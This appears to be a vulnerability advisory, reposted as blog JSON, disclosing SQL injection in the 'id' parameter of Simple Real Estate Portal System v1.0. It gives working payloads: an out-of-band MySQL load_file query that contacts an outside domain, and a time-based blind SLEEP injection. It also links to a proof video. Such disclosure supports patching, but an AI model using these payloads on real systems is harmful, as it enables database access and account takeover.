## Title: Simple Real Estate Portal System v1.0 remote SQL-Injections
\n## Author: nu11secur1ty
\n## Date: 02.20.2022
\n## Vendor: https:\/\/www.sourcecodester.com\/users\/tips23
\n## Software: https:\/\/www.sourcecodester.com\/php\/15184\/simple-real-estate-portal-system-phpoop-free-source-code.html<\/p>\n
## Description:
\nThe id parameter appears to be vulnerable to SQL injection attacks.
\nThe payload ‘+(select
\nload_file(‘\\\\\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.http:\/\/stupid_asshole.com\\\\foh’))+’
\nwas submitted in the id parameter.
\nThis payload injects a SQL sub-query that calls MySQL’s load_file
\nfunction with a UNC file path that references a URL on an external
\ndomain.
\nThe application interacted with that domain, indicating that the
\ninjected SQL query was executed.
\nThe attacker from outside can take control of all accounts of this
\nsystem by using this vulnerability!
\nWARNING: If this is in some external domain, or some subdomain, or
\ninternal, this will be extremely dangerous!
\nStatus: CRITICAL<\/p>\n
[+] Payloads:<\/p>\n
“`mysql
\n—
\nParameter: id (GET)
\nType: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: p=view_estate&id=2’+(select
\nload_file(‘\\\\\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.https:\/\/www.sourcecodester.com\/php\/15184\/simple-real-estate-portal-system-phpoop-free-source-code.html\\\\foh’))+”
\nAND (SELECT 2183 FROM (SELECT(SLEEP(3)))uXKK) AND ‘NnWW’=’NnWW
\n—<\/p>\n
“`
\n## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/edit\/main\/vendors\/oretnom23\/2022\/Simple-Real-Estate-Portal-System)<\/p>\n
## Proof and Exploit:
\n[href](https:\/\/streamable.com\/lffled)<\/p>\n","protected":false},"excerpt":{"rendered":"
## Title: Simple Real Estate Portal System v1.0 remote SQL-Injections ## Author: nu11secur1ty ## Date: 02.20.2022 ## Vendor: https:\/\/www.sourcecodester.com\/users\/tips23 ## Software: https:\/\/www.sourcecodester.com\/php\/15184\/simple-real-estate-portal-system-phpoop-free-source-code.html ## Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload ‘+(select load_file(‘\\\\\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.http:\/\/stupid_asshole.com\\\\foh’))+’ was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL’s load_file …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20918","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20918","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20918"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20918\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20918"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20918"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20918"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}